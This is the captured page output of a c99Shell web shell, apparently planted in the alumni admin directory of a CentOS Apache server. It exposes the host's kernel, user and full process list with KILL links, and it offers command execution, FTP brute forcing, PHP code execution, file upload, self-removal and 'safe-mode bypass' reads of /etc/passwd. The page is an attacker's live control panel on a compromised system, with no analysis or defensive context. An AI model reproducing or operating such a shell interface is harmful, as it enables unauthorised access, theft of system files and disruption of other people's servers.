!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/admin/pages/users/   drwxr-xr-x
Free 50.85 GB of 127.8 GB (39.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Processes:
USERPID%CPU%MEMVSZRSSTTYSTATSTARTTIMECOMMAND
root6040.00.000?S<Jul220:00[ata_aux]KILL
root6140.00.000?S<Jul220:00[scsi_eh_1]KILL
root6030.00.000?S<Jul220:00[ata/7]KILL
root6020.00.000?S<Jul220:00[ata/6]KILL
root6000.00.000?S<Jul220:00[ata/4]KILL
root6010.00.000?S<Jul220:00[ata/5]KILL
root6150.00.000?S<Jul220:00[scsi_eh_2]KILL
root6160.00.000?S<Jul220:00[scsi_eh_3]KILL
root7120.00.000?S<Jul2224:38[kjournald]KILL
root7380.00.000?S<Jul220:15[kauditd]KILL
root6730.00.000?S<Jul220:00[ksnapd]KILL
root6360.00.000?S<Jul220:00[kstriped]KILL
root6170.00.000?S<Jul220:00[scsi_eh_4]KILL
root5990.00.000?S<Jul220:00[ata/3]KILL
root5980.00.000?S<Jul220:00[ata/2]KILL
root3100.00.000?S<Jul220:00[aio/5]KILL
root3110.00.000?S<Jul220:00[aio/6]KILL
root3090.00.000?S<Jul220:00[aio/4]KILL
root3080.00.000?S<Jul220:00[aio/3]KILL
root3070.00.000?S<Jul220:00[aio/2]KILL
root3120.00.000?S<Jul220:00[aio/7]KILL
root4790.00.000?S<Jul220:00[kpsmoused]KILL
root5960.00.000?S<Jul220:00[ata/0]KILL
root5970.00.000?S<Jul220:00[ata/1]KILL
root5860.00.000?S<Jul220:00[scsi_eh_0]KILL
root5850.00.000?S<Jul220:00[mpt/0]KILL
root5840.00.000?S<Jul220:00[mpt_poll_0]KILL
root21520.00.000?S<Jul220:00[kmpathd/0]KILL
root21530.00.000?S<Jul220:00[kmpathd/1]KILL
root28880.00.000?S<Jul220:00[rpciod/2]KILL
root28890.00.000?S<Jul220:00[rpciod/3]KILL
root28870.00.000?S<Jul220:00[rpciod/1]KILL
root28860.00.000?S<Jul220:00[rpciod/0]KILL
root28220.00.000?S<Jul220:00[kondemand/7]KILL
root28900.00.000?S<Jul220:00[rpciod/4]KILL
root28910.00.000?S<Jul220:00[rpciod/5]KILL
root284680.00.000?SDec250:00[pdflush]KILL
root292650.00.000?SDec250:01[pdflush]KILL
root30010.00.000?S<Jul220:00[krfcommd]KILL
root28930.00.000?S<Jul220:00[rpciod/7]KILL
root28920.00.000?S<Jul220:00[rpciod/6]KILL
root28210.00.000?S<Jul220:00[kondemand/6]KILL
root28200.00.000?S<Jul220:00[kondemand/5]KILL
root21570.00.000?S<Jul220:00[kmpathd/5]KILL
root21580.00.000?S<Jul220:00[kmpathd/6]KILL
root21560.00.000?S<Jul220:00[kmpathd/4]KILL
root21550.00.000?S<Jul220:00[kmpathd/3]KILL
root21540.00.000?S<Jul220:00[kmpathd/2]KILL
root21600.00.000?S<Jul220:00[kmpath_handlerd]KILL
root22300.00.000?S<Jul220:00[kjournald]KILL
root28180.00.000?S<Jul220:00[kondemand/3]KILL
root28190.00.000?S<Jul220:00[kondemand/4]KILL
root28170.00.000?S<Jul220:00[kondemand/2]KILL
root28160.00.000?S<Jul220:00[kondemand/1]KILL
root28150.00.000?S<Jul220:00[kondemand/0]KILL
root3060.00.000?S<Jul220:00[aio/1]KILL
root21590.00.000?S<Jul220:00[kmpathd/7]KILL
root30.00.000?SNJul220:00[ksoftirqd/0]KILL
root210.00.000?SNJul220:00[ksoftirqd/6]KILL
root200.00.000?S<Jul220:00[migration/6]KILL
root190.00.000?S<Jul220:00[watchdog/5]KILL
root170.00.000?S<Jul220:06[migration/5]KILL
root180.00.000?SNJul220:00[ksoftirqd/5]KILL
root220.00.000?S<Jul220:00[watchdog/6]KILL
root240.00.000?SNJul220:00[ksoftirqd/7]KILL
root280.00.000?S<Jul220:00[events/2]KILL
root290.00.000?S<Jul220:00[events/3]KILL
root270.00.000?S<Jul220:00[events/1]KILL
root260.00.000?S<Jul220:00[events/0]KILL
root250.00.000?S<Jul220:00[watchdog/7]KILL
root160.00.000?S<Jul220:00[watchdog/4]KILL
root150.00.000?SNJul220:00[ksoftirqd/4]KILL
root60.00.000?SNJul220:02[ksoftirqd/1]KILL
root70.00.000?S<Jul220:00[watchdog/1]KILL
root50.00.000?S<Jul220:08[migration/1]KILL
root3050.00.000?S<Jul220:00[aio/0]KILL
root40.00.000?S<Jul220:00[watchdog/0]KILL
root80.00.000?S<Jul220:03[migration/2]KILL
root90.00.000?SNJul220:00[ksoftirqd/2]KILL
root130.00.000?S<Jul220:00[watchdog/3]KILL
root140.00.000?S<Jul220:00[migration/4]KILL
root120.00.000?SNJul220:00[ksoftirqd/3]KILL
root110.00.000?S<Jul220:02[migration/3]KILL
root100.00.000?S<Jul220:00[watchdog/2]KILL
root20.00.000?S<Jul220:01[migration/0]KILL
root230.00.000?S<Jul220:00[migration/7]KILL
root1890.00.000?S<Jul220:00[cqueue/1]KILL
root1900.00.000?S<Jul220:00[cqueue/2]KILL
root1910.00.000?S<Jul220:00[cqueue/3]KILL
root300.00.000?S<Jul220:00[events/4]KILL
root530.00.000?S<Jul220:00[kacpid]KILL
root510.00.000?S<Jul220:00[kblockd/6]KILL
root520.00.000?S<Jul220:00[kblockd/7]KILL
root1920.00.000?S<Jul220:00[cqueue/4]KILL
root1930.00.000?S<Jul220:00[cqueue/5]KILL
root3010.00.000?SJul220:00[khungtaskd]KILL
root3040.00.000?S<Jul221:53[kswapd0]KILL
root2000.00.000?S<Jul220:00[kseriod]KILL
root1980.00.000?S<Jul220:00[khubd]KILL
root1940.00.000?S<Jul220:00[cqueue/6]KILL
root1950.00.000?S<Jul220:00[cqueue/7]KILL
root500.00.000?S<Jul220:00[kblockd/5]KILL
root1880.00.000?S<Jul220:00[cqueue/0]KILL
root490.00.000?S<Jul220:00[kblockd/4]KILL
root450.00.000?S<Jul220:00[kblockd/0]KILL
root340.00.000?S<Jul220:00[khelper]KILL
root330.00.000?S<Jul220:00[events/7]KILL
root310.00.000?S<Jul220:00[events/5]KILL
root320.00.000?S<Jul220:00[events/6]KILL
root460.00.000?S<Jul220:06[kblockd/1]KILL
root350.00.000?S<Jul220:00[kthread]KILL
root480.00.000?S<Jul220:02[kblockd/3]KILL
root470.00.000?S<Jul220:03[kblockd/2]KILL
root35220.00.01664428tty3Ss+Jul220:00/sbin/mingetty tty3KILL
root35210.00.01664420tty2Ss+Jul220:00/sbin/mingetty tty2KILL
root35200.00.01664420tty1Ss+Jul220:00/sbin/mingetty tty1KILL
root35230.00.01664424tty4Ss+Jul220:00/sbin/mingetty tty4KILL
root35260.00.01664448tty6Ss+Jul220:00/sbin/mingetty tty6KILL
root35250.00.01664424tty5Ss+Jul220:00/sbin/mingetty tty5KILL
root30470.00.01676528?SsJul220:00/usr/sbin/acpidKILL
root27560.00.01680404?SsJul220:00klogd -xKILL
root27530.00.01728572?SsJul223:46syslogd -m 0KILL
rpc28530.00.01816632?SsJul220:00portmapKILL
root33440.00.01908368?SsJul220:00gpm -m /dev/input/mice -t exps2KILL
root30970.00.01916460?SsJul220:00/usr/bin/hidd --serverKILL
root29060.00.01968832?SsJul220:00rpc.statdKILL
6830690.00.02020808?SJul220:00hald-addon-acpi: listening on acpid socket /var/run/acpid.socketKILL
root10.00.02072632?SsJul220:40init [5]KILL
root29540.00.02172764?SsJul220:00/usr/sbin/hcidKILL
apache202570.00.02184832?R12:290:00ps -auxKILL
root34090.00.02268432?SsJul220:00/usr/sbin/atdKILL
root28420.00.02472376?SsJul221:24irqbalanceKILL
root7710.00.02476928?S<sJul220:00/sbin/udevd -dKILL
root35140.00.025641120?SNJul220:00/usr/libexec/gam_serverKILL
avahi34370.00.02600304?SsJul220:00avahi-daemon: chroot helperKILL
avahi34360.00.026001292?SsJul220:05avahi-daemon: running [mx-ll-110-164-51-230.local]KILL
dbus29450.00.02848980?SsJul220:06dbus-daemon --systemKILL
root30610.00.03164980?SJul220:00hald-runnerKILL
root35060.00.03516436?SJul220:00/usr/sbin/smartd -q neverKILL
xfs33920.00.038401680?SsJul220:00xfs -droppriv -daemonKILL
ntp31850.00.045244520?SLsJul220:02ntpd -u ntp:ntp -p /var/run/ntpd.pid -gKILL
root85160.00.045361212?SOct290:00/bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --user=mysqlKILL
root31420.00.05156500?SsJul220:00./hpiodKILL
root33630.00.052841100?SsJul220:00crondKILL
root29300.00.05820644?SsJul220:00rpc.idmapdKILL
6830600.00.062404308?SsJul220:02haldKILL
root72391.00.068201884?Ss10:521:00/usr/libexec/openssh/sftp-serverKILL
root31600.00.070681068?SsJul225:14/usr/sbin/sshdKILL
smmsp33340.00.081681528?SsJul220:00sendmail: Queue runner@01:00:00 for /var/spool/clientmqueueKILL
root33260.00.093321936?SsJul220:00sendmail: accepting connectionsKILL
root31690.00.0101442372?SsJul220:00cupsdKILL
root36450.00.0112525204tty7Ss+Jul220:27/usr/bin/Xorg :0 -br -audit 0 -auth /var/gdm/:0.Xauth -nolisten tcp vt7KILL
root723711.80.0117484872?Rs10:5211:22sshd: root@nottyKILL
root31470.00.0134684644?SJul220:00python ./hpssd.pyKILL
root27290.00.013544820?S<slJul223:16auditdKILL
root27310.00.014124940?S<slJul220:53/sbin/audispdKILL
root35280.00.0155562904?SsJul220:00/usr/sbin/gdm-binary -nodaemonKILL
root35150.00.11564813600?SsJul220:06/usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.confKILL
root36400.00.0161682336?SJul220:00/usr/sbin/gdm-binary -nodaemonKILL
root33540.00.0228287940?SsJul220:06/usr/sbin/httpdKILL
root30370.00.0231121436?SslJul220:10pcscdKILL
apache202420.30.0255406068?S12:280:00/usr/sbin/httpdKILL
root35120.00.12779212572?SNJul220:05/usr/bin/python -tt /usr/sbin/yum-updatesdKILL
apache189290.20.1280809464?S12:190:01/usr/sbin/httpdKILL
root36420.00.0285203768?SlJul220:00/usr/libexec/gdm-rh-security-token-helperKILL
apache189210.10.12892010264?S12:190:00/usr/sbin/httpdKILL
apache167450.10.12898010372?S12:040:02/usr/sbin/httpdKILL
apache180540.10.12904410568?S12:130:01/usr/sbin/httpdKILL
apache195620.20.12909210508?S12:240:00/usr/sbin/httpdKILL
apache189280.10.12918410540?S12:190:00/usr/sbin/httpdKILL
apache200870.30.12942410912?S12:280:00/usr/sbin/httpdKILL
apache178780.10.12943210952?S12:120:01/usr/sbin/httpdKILL
apache182980.10.12945210952?S12:140:01/usr/sbin/httpdKILL
apache195050.40.12951611016?S12:240:01/usr/sbin/httpdKILL
apache195630.10.12970011116?S12:240:00/usr/sbin/httpdKILL
root31250.00.0303321384?SslJul220:48automountKILL
gdm36680.00.13134015876?SsJul220:00/usr/libexec/gdmgreeterKILL
apache192010.30.13190013624?S12:220:01/usr/sbin/httpdKILL
apache161730.10.13214813492?S12:010:02/usr/sbin/httpdKILL
apache186970.20.13216013480?S12:180:01/usr/sbin/httpdKILL
apache191970.20.13216813616?S12:210:01/usr/sbin/httpdKILL
apache181750.20.13218013644?S12:130:02/usr/sbin/httpdKILL
apache157130.10.13264814296?S11:590:02/usr/sbin/httpdKILL
apache194530.40.13298414736?S12:240:01/usr/sbin/httpdKILL
apache159470.10.13311215000?S12:000:03/usr/sbin/httpdKILL
apache143120.20.13313214888?S11:490:05/usr/sbin/httpdKILL
mysql85663.73.1400316261428?SlOct293221:42/usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sockKILL

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0251 ]--